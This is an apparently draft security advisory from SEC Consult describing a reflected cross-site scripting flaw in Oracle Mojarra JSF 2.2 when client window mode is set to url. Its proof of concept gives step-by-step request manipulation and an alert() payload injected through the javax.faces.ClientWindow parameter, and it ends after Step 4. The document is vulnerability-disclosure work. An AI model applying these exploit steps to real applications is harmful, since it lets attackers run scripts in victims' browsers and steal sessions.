Confidentiality class: Internal & Partner SEC Consult Vulnerability Lab Security Advisory < publishing date YYYYMMDD-0 > ======================================================================= title: Reflected Cross-Site Scripting (XSS) product: Oracle Mojarra JSF included in Java EE 7 vulnerable version: 2.2 fixed version: CVE number: impact: High homepage: https://javaserverfaces.github.io/ found: 2018-11-12 by: Jean-Benjamin Rousseau (Office Zurich) Guillaume Crouquet (Office Zurich) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "JavaServer Faces technology simplifies building user interfaces for JavaServer applications. Developers can build web applications by assembling reuseable UI components in a page; connecting these components to an application data source; and wiring client-generated events to server-side event handlers. This project provides information on the continued development of the JavaServer Faces specification. JavaServer Faces (JSF) is a JCP Standard technology for authoring component based user interfaces on the Java EE platform." Source: https://javaee.github.io/javaserverfaces-spec/ Business recommendation: ------------------------ By exploiting the vulnerability documented in this advisory, an attacker can execute arbitrary scripts in the context of the web application in the victim's browser. Besides performing arbitrary actions within the application with the victim's account or manipulating the application's interface, the attacker can potentially steal session tokens, redirect the victim to external pages and perform attacks against their browser. SEC Consult recommends to [tbd vendor patch / workaround] Vulnerability overview/description: ----------------------------------- The Oracle Mojarra implementation of JavaServer Faces (JSF) v2.2 is affected by a Reflected Cross-Site Scripting (XSS). Oracle Mojarra JSF v2.2 is the user interface standard for Java EE 7. This vulnerability only affects the web applications which use AJAX requests and which have set the javax.faces.CLIENT_WINDOW_MODE context parameter to "url" in the web.xml file: javax.faces.CLIENT_WINDOW_MODE url In this configuration, the web applications will use the javax.faces.ClientWindow POST parameter for their AJAX requests. Because the javax.faces.ClientWindow parameter is not properly sanitized, an XSS attack is possible. Proof of concept: ----------------- In this Proof of Concept, the tests are based on PrimeFaces v6.0, an open source framework for JSF. The tests can be executed on any framework based on Oracle Mojarra JSF 2.2. Step 1: Generate an AJAX request on the web application and intercept it. POST /HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0 HTTP/1.1 Host: localhost:8080 Content-Length: 405 Accept: application/xml, text/xml, */*; q=0.01 Origin: http://localhost:8080 X-Requested-With: XMLHttpRequest Faces-Request: partial/ajax Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: JSESSIONID=2a616ef87aeed7521b02ceb4e163 Connection: close javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 Step 2: Transpose the POST parameters into GET parameters and build a new URL with it. http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ViewState=7025249133904776332%3A-921340693957557245&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 Step 3: Strip out the javax.faces.ViewState GET parameter from the URL. http://localhost:8080/HelloPrimeFaces/faces/welcomePrimefaces.xhtml?jfwid=2a616ef87aeed7521b02ceb4e163:0&javax.faces.partial.ajax=true&javax.faces.source=j_idt18%3AbtnSurname&javax.faces.partial.execute=j_idt18%3AbtnSurname+j_idt18%3Asurname&javax.faces.partial.render=j_idt18%3Agrid&j_idt18%3AbtnSurname=j_idt18%3AbtnSurname&j_idt18=j_idt18&j_idt18%3Afirstname=&j_idt18%3Asurname=surname&javax.faces.ClientWindow=2a616ef87aeed7521b02ceb4e163%3A0 Step 4: Prefix the javax.faces.ClientWindow GET parameter with the following payload: ]]>alert('SEC Consult')alert('SEC+Consult')